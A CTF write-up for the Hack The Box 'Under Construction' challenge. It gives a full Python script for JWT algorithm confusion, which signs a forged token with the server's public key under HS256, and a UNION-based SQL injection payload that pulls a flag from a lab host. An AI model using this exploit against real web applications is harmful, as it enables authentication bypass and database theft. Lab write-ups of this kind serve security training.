Post

HackTheBox Under Construction Writeup

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the Under Construction Challenge on Hack The Box. This medium-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/111

Description

A company that specialises in web development is creating a new site that is currently under construction. Can you obtain the flag?

Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

#!/usr/bin/python3
import jwt, base64, ast, math, hmac, hashlib, binascii, json, sys, requests

def gen_token(token, payload):
    header = ast.literal_eval(base64.b64decode(token.split(".")[0]).decode("UTF-8"))
    header['alg'] = "HS256"
    data = ast.literal_eval(base64.b64decode(token.split(".")[1].ljust((int)(math.ceil(len(token.split(".")[1]) / 4)) * 4, '=')).decode("UTF-8"))
    data['username'] = payload
    public_key = data['pk'].encode("UTF-8")
    header = base64.urlsafe_b64encode(json.dumps(header).encode('utf-8')).decode().strip('=')
    data = base64.urlsafe_b64encode(json.dumps(data).encode('utf-8')).decode().strip('=')
    jwt_header_data = header + "." + data
    mess = jwt_header_data.encode("UTF-8")
    signature = hmac.new(public_key, mess, hashlib.sha256).hexdigest()
    sign = str(base64.urlsafe_b64encode(binascii.a2b_hex(signature))).replace('=','')
    sign = sign.split("'")[1]
    return jwt_header_data + "." + sign

try:
    if sys.argv[1] == None or sys.argv[2] == None or sys.argv[3] == None:
        exit()
    else:
        token_new = gen_token(sys.argv[1], sys.argv[3])
        rq = requests.get(sys.argv[2], cookies= {"session": str(token_new)}, allow_redirects=False)
        rp = rq.content
        print(str(rp)[1778:int(str(rp).index('<br>'))])
except:
    print(f"Uses: {sys.argv[0]} <token> <host> <payload>")
    exit()

Register, log in, copy the token, and then run the script.

1

python poc eyJhbGciO.... http://94.237.50.242:59187/ "' union select 1,top_secret_flaag,3 FROM flag_storage--"

Summary

The Under Construction Challenge on Hack The Box is a medium-level challenge focused on JWT manipulation and SQL injection. Participants are tasked with modifying a JWT token to inject a custom payload, revealing the flag through a web request. The challenge emphasizes understanding token structure, encryption reversal, and exploiting vulnerabilities like SQL injection, offering hands-on experience in web security and encryption techniques.

challenge
htb challenge writeup linux web
This post is licensed under CC BY 4.0 by the author.